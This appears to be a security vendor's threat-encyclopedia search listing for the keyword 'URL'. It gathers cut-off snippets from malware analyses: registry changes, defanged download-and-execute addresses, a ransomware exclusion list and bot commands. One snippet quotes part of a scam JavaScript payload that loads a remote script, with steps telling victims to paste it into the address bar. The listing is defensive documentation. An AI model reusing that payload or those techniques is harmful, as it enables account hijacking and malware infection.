Keyword: URL
\ WorkgroupCrawler\Shares shared = "\New Folder.exe" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Internet Explorer\SearchScopes URL = "{random characters}" HKEY_CURRENT_USER\Software\Microsoft\ Internet Explorer
websites to download files: http://www.pta.gov.pk/index.php - non-malicious URL Note: The malware repeatedly connects to this URL to perform its DDoS attack. It saves the files it downloads using the
CAB cab CMD cmd COM com cpl CPL exe EXE ini INI dll DLL lnk LNK url URL ttf TTF DECRYPT.txt It avoids encrypting files with the following strings in their file path: $RECYCLE.BIN rsa NTDETECT.COM ntldr
Microsoft Support site, it does look like a legitimate Microsoft site, only the URL is not. The PC Support site fronts a Virus Removal Malware Support page wherein visitors are guided through a step-by-step
designed to steal information from users. ZBOT variants typically access a URL from which they retrieve a configuration file containing the list of websites they will monitor and steal information from. Some reports
As of this writing, the said sites are inaccessible. NOTES: This Trojan sends the following system information to the URL {BLOCKED}8.net:6032 : CPU Speed Operating System used RAM System Language 12
environment. NOTES: Download Routine This malware attempts to connect to the following URL to download and execute another file: http://{BLOCKED}t.com/3/1.php?q={number} If download is successful, it signals the
TabProcGrowth = "0" HKEY_LOCAL_MACHINE\ SOFTWARE\ MICROSOFT\ Windows\ CURRENTVERSION\ URL SystemMgr = "Del" HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\ protected\AVP7\profiles\ Updater enabled = "0" Other Details
}5u.{BLOCKED}33.info//e.js?'+Math.random(),facebookdigits.body.appendChild(activation);void(0) 2. Delete the actual address from the url field in your browser and paste the code instead. 3. Press Enter
XP, and Server 2003.) NOTES: As of this writing, the URL where the file can be downloaded is already inaccessible and it redirects to http://www.yahoo.co.jp . As a result, the downloaded file saved as
a virtual environment. NOTES: This spyware attempts to connect to the following URL to download and execute another file: http://{BLOCKED}t.com/3/1.php?q={number} If download is successful, it signals
the malware server Market - view a package specified by the malware server in the Android Market Web - view a URL specified by the malware server 12 for 2012: What Will The New Year Bring? Steals
(Default) = "%System%\MediaP.dll" NOTES: It connects to the following URL when Internet Explorer is opened: http://www.{BLOCKED}babys.com/cgi-bin/mmlogin.cgi Trojan.Win32.BHO.bnwy (Kaspersky), W32/BHO.BNWY
\Managechar.exe = %Application Data%\Managechar.exe NOTES: It connects to the following URL via HTTP GET to access other advertisement sites and possibly download other files into the system. However, during
value} NOTES: When a successful connection is made, this Trojan downloads a file from the URL with the parameters {Accessible URL}/get/faa91cf5e79a76602f094ed38fad5872.exe . If the malware failed to
Firefox)/ Chrome Service Pack (for Google Chrome) to certain web browsers: 1.crx (for Google Chrome) 2.xpi (for Mozilla Firefox) It connects to the following URL to update its stat counter: http://whos.
a URL using a hidden browser (POST): Send POST floods (QUIT): Terminate itself (SHELL EXEC): Execute shell command (SPEEDTEST): Check connection speed (STOP EXEC): Stop a specific thread (STOP GET):